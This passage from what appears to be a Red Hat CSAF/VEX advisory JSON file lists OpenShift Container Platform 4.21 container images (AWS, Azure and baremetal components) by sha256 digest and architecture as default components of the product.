"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:7662f86e2f8f23582ae548c70dad5458e37256f9c4cdc401be880e319ef591c2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:7662f86e2f8f23582ae548c70dad5458e37256f9c4cdc401be880e319ef591c2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:cb234cf1c44de4b0b0713b2792e06e115830b115d540b494baccad28139b4fd2_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:cb234cf1c44de4b0b0713b2792e06e115830b115d540b494baccad28139b4fd2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:cb234cf1c44de4b0b0713b2792e06e115830b115d540b494baccad28139b4fd2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:7f0514302066e0f199e33be56fe074f7666e223169df5f71b06e06779bdb6e8b_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:7f0514302066e0f199e33be56fe074f7666e223169df5f71b06e06779bdb6e8b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:7f0514302066e0f199e33be56fe074f7666e223169df5f71b06e06779bdb6e8b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:df3552170db05d67f4e75e756495f62164a28bd7468f4093e43f3a7c13bf7682_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:df3552170db05d67f4e75e756495f62164a28bd7468f4093e43f3a7c13bf7682_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:df3552170db05d67f4e75e756495f62164a28bd7468f4093e43f3a7c13bf7682_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:9c8cebfcb7f84844bb476441b61c60a3c88fc562406c84689958b517282966d3_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:9c8cebfcb7f84844bb476441b61c60a3c88fc562406c84689958b517282966d3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:9c8cebfcb7f84844bb476441b61c60a3c88fc562406c84689958b517282966d3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:c7609e999d1c88e83dd99682b5756386c274d506704340d78be73efe9e6f35b1_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:c7609e999d1c88e83dd99682b5756386c274d506704340d78be73efe9e6f35b1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:c7609e999d1c88e83dd99682b5756386c274d506704340d78be73efe9e6f35b1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:07c82fce5e470c7ee9c3c1fdc6c953c962ed119411c88bf5fd4f0a08e3a0b9b7_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:07c82fce5e470c7ee9c3c1fdc6c953c962ed119411c88bf5fd4f0a08e3a0b9b7_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:07c82fce5e470c7ee9c3c1fdc6c953c962ed119411c88bf5fd4f0a08e3a0b9b7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:83a7a3bb3080d3386eb7fa7debe976a551c272a1d70f31d7cc05a437f175f0c2_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:83a7a3bb3080d3386eb7fa7debe976a551c272a1d70f31d7cc05a437f175f0c2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:83a7a3bb3080d3386eb7fa7debe976a551c272a1d70f31d7cc05a437f175f0c2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:aa7cbd8edc2a40bf3b8572f48f1174b46134ecd22c1a961984c7989398a5a0ab_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:aa7cbd8edc2a40bf3b8572f48f1174b46134ecd22c1a961984c7989398a5a0ab_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:aa7cbd8edc2a40bf3b8572f48f1174b46134ecd22c1a961984c7989398a5a0ab_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:e9c7cedabf9b749ae2faf9427a229757c3c1c5871054667444168030eab28aab_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:e9c7cedabf9b749ae2faf9427a229757c3c1c5871054667444168030eab28aab_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:e9c7cedabf9b749ae2faf9427a229757c3c1c5871054667444168030eab28aab_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f3470dd96c2c29ceef92ea0ab5adfcecead95eba0f1caa1fad96f3fdf50f57c6_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f3470dd96c2c29ceef92ea0ab5adfcecead95eba0f1caa1fad96f3fdf50f57c6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f3470dd96c2c29ceef92ea0ab5adfcecead95eba0f1caa1fad96f3fdf50f57c6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f96eef8cedb41be61dcaf4850e5550582f0d84a306775dfc0c7f9958f18ba7ff_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f96eef8cedb41be61dcaf4850e5550582f0d84a306775dfc0c7f9958f18ba7ff_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f96eef8cedb41be61dcaf4850e5550582f0d84a306775dfc0c7f9958f18ba7ff_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:5d09872519b5a3247dd7a3d5bd250485dcd750307c3853e2cdf43519889178ff_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:5d09872519b5a3247dd7a3d5bd250485dcd750307c3853e2cdf43519889178ff_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:5d09872519b5a3247dd7a3d5bd250485dcd750307c3853e2cdf43519889178ff_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:63523bed0624b4db33be2b7a5e8dd3c5b532c70a3ad3083504aebc29e85d3a29_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:63523bed0624b4db33be2b7a5e8dd3c5b532c70a3ad3083504aebc29e85d3a29_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:63523bed0624b4db33be2b7a5e8dd3c5b532c70a3ad3083504aebc29e85d3a29_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:20a2d23d2de3e31036ca89f2d629b6d06df5504b8f46c88a6cb5e081aa6afdc8_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:20a2d23d2de3e31036ca89f2d629b6d06df5504b8f46c88a6cb5e081aa6afdc8_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:20a2d23d2de3e31036ca89f2d629b6d06df5504b8f46c88a6cb5e081aa6afdc8_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:c47e8b82686adae62dd7c66b82309407d82166f510384a404343e515b829001d_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:c47e8b82686adae62dd7c66b82309407d82166f510384a404343e515b829001d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:c47e8b82686adae62dd7c66b82309407d82166f510384a404343e515b829001d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:cb2a3088916b8d8f9489260792f677a59864ab01e9c62361198549b1f822a80b_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:cb2a3088916b8d8f9489260792f677a59864ab01e9c62361198549b1f822a80b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:cb2a3088916b8d8f9489260792f677a59864ab01e9c62361198549b1f822a80b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:f18c64ad1dd81b9ae774488b6994b6d17f6aeb968e644652150ea08b3f6b4dbb_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:f18c64ad1dd81b9ae774488b6994b6d17f6aeb968e644652150ea08b3f6b4dbb_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:f18c64ad1dd81b9ae774488b6994b6d17f6aeb968e644652150ea08b3f6b4dbb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:a0f3e8ad332f4e63e1aa2742eef069487fd49f4c335269da7b619f7630907a45_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:a0f3e8ad332f4e63e1aa2742eef069487fd49f4c335269da7b619f7630907a45_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:a0f3e8ad332f4e63e1aa2742eef069487fd49f4c335269da7b619f7630907a45_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:d2dfd7ae650a6eaced303a1119f94cc1a7097d7609e2a80d84aef5e6380d902e_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:d2dfd7ae650a6eaced303a1119f94cc1a7097d7609e2a80d84aef5e6380d902e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:d2dfd7ae650a6eaced303a1119f94cc1a7097d7609e2a80d84aef5e6380d902e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:2d622f4dbba3bd91a020a734dc0d8c632e58d56373cae44c4af79cbc81a37cd4_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:2d622f4dbba3bd91a020a734dc0d8c632e58d56373cae44c4af79cbc81a37cd4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:2d622f4dbba3bd91a020a734dc0d8c632e58d56373cae44c4af79cbc81a37cd4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:8a69bf9f6b9f8e3dc685d704d31b4a4eded70bdf33ed57dfa8768c016faae46a_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:8a69bf9f6b9f8e3dc685d704d31b4a4eded70bdf33ed57dfa8768c016faae46a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:8a69bf9f6b9f8e3dc685d704d31b4a4eded70bdf33ed57dfa8768c016faae46a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:9d0697a33547102399cbeb0a60f9ebfb2a2eb4d3c0e15efba177a96dd27e60f8_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:9d0697a33547102399cbeb0a60f9ebfb2a2eb4d3c0e15efba177a96dd27e60f8_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:9d0697a33547102399cbeb0a60f9ebfb2a2eb4d3c0e15efba177a96dd27e60f8_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:c87863f0cd97c592cc54c1fc2ab9fbe1468d6302763eaa7a6530af059382d797_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:c87863f0cd97c592cc54c1fc2ab9fbe1468d6302763eaa7a6530af059382d797_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:c87863f0cd97c592cc54c1fc2ab9fbe1468d6302763eaa7a6530af059382d797_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:2a8fa4bac908dd97a3be2e302eb6ac1431dc3537beed23caf257d2c3f47bbc74_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:2a8fa4bac908dd97a3be2e302eb6ac1431dc3537beed23caf257d2c3f47bbc74_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:2a8fa4bac908dd97a3be2e302eb6ac1431dc3537beed23caf257d2c3f47bbc74_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:98994385568f84af533c448d17ae372eac4a26eda4a6b62277253155e20bae54_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:98994385568f84af533c448d17ae372eac4a26eda4a6b62277253155e20bae54_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:98994385568f84af533c448d17ae372eac4a26eda4a6b62277253155e20bae54_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:0b92ec408159a4f0e5308cf58ad89cc4ca40880ce097e0807a19c12f235ca5fc_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:0b92ec408159a4f0e5308cf58ad89cc4ca40880ce097e0807a19c12f235ca5fc_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:0b92ec408159a4f0e5308cf58ad89cc4ca40880ce097e0807a19c12f235ca5fc_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:291f1185778ccc92e28d235ab30ddb1f85fb94199d3889dcf600f35e60093d4c_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:291f1185778ccc92e28d235ab30ddb1f85fb94199d3889dcf600f35e60093d4c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:291f1185778ccc92e28d235ab30ddb1f85fb94199d3889dcf600f35e60093d4c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:7a6604dbc334622a976776e7725e4eba7ba4e8872a87f49bbb1c6f334b2f6c95_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:7a6604dbc334622a976776e7725e4eba7ba4e8872a87f49bbb1c6f334b2f6c95_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:7a6604dbc334622a976776e7725e4eba7ba4e8872a87f49bbb1c6f334b2f6c95_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:b2b43c379dcfac66d038927315c419c7d512ce1dd29b34c7dc74a00f7b63a0d1_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:b2b43c379dcfac66d038927315c419c7d512ce1dd29b34c7dc74a00f7b63a0d1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:b2b43c379dcfac66d038927315c419c7d512ce1dd29b34c7dc74a00f7b63a0d1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5628a2419c5721f274edcfe794c881d1fb2af158788c45fbcb7a33f6db9948d4_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5628a2419c5721f274edcfe794c881d1fb2af158788c45fbcb7a33f6db9948d4_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5628a2419c5721f274edcfe794c881d1fb2af158788c45fbcb7a33f6db9948d4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:56b71e09ae6780121a1c0a52867782196cd43c3e716093fca3ceb3fde5b66d1f_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:56b71e09ae6780121a1c0a52867782196cd43c3e716093fca3ceb3fde5b66d1f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:56b71e09ae6780121a1c0a52867782196cd43c3e716093fca3ceb3fde5b66d1f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5c1172fb42f1b34b67f5e2044bb190849bacaf5eebabdafdc82d0a7f1c1a7d84_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5c1172fb42f1b34b67f5e2044bb190849bacaf5eebabdafdc82d0a7f1c1a7d84_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5c1172fb42f1b34b67f5e2044bb190849bacaf5eebabdafdc82d0a7f1c1a7d84_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:d617cb1a419f9d43b5bfff5bfdc670a9c8d0462b47c474d4d1ccea726c108101_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:d617cb1a419f9d43b5bfff5bfdc670a9c8d0462b47c474d4d1ccea726c108101_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:d617cb1a419f9d43b5bfff5bfdc670a9c8d0462b47c474d4d1ccea726c108101_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:03f260cff8faf00b22557be8d6be6f81489e9265b339c3a3053bfe5b1de020e7_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:03f260cff8faf00b22557be8d6be6f81489e9265b339c3a3053bfe5b1de020e7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:03f260cff8faf00b22557be8d6be6f81489e9265b339c3a3053bfe5b1de020e7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:5cc05e80c48b83737bcd3f4622e0eedaed7baf06024c23753ca77ffc11b9b306_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:5cc05e80c48b83737bcd3f4622e0eedaed7baf06024c23753ca77ffc11b9b306_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:5cc05e80c48b83737bcd3f4622e0eedaed7baf06024c23753ca77ffc11b9b306_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:9df1f434a7eae17b9e335feb35d3cad8d15887bc55d2f20c8720ac17633e88f5_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:9df1f434a7eae17b9e335feb35d3cad8d15887bc55d2f20c8720ac17633e88f5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:9df1f434a7eae17b9e335feb35d3cad8d15887bc55d2f20c8720ac17633e88f5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:e3d92a87de3c10beda3aba219657f079cafcd03c6ee0b87bd0826d3f51e85997_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:e3d92a87de3c10beda3aba219657f079cafcd03c6ee0b87bd0826d3f51e85997_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:e3d92a87de3c10beda3aba219657f079cafcd03c6ee0b87bd0826d3f51e85997_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:20f0c4f5e4678aac81a44e5f164627b29bbebfc3e17b5010ea7104309a234476_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:20f0c4f5e4678aac81a44e5f164627b29bbebfc3e17b5010ea7104309a234476_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:20f0c4f5e4678aac81a44e5f164627b29bbebfc3e17b5010ea7104309a234476_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:2125f95e12d8c30d743da09f3f8451e70a7b0cd8299b173f748a4affd1aab940_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:2125f95e12d8c30d743da09f3f8451e70a7b0cd8299b173f748a4affd1aab940_amd64"
},
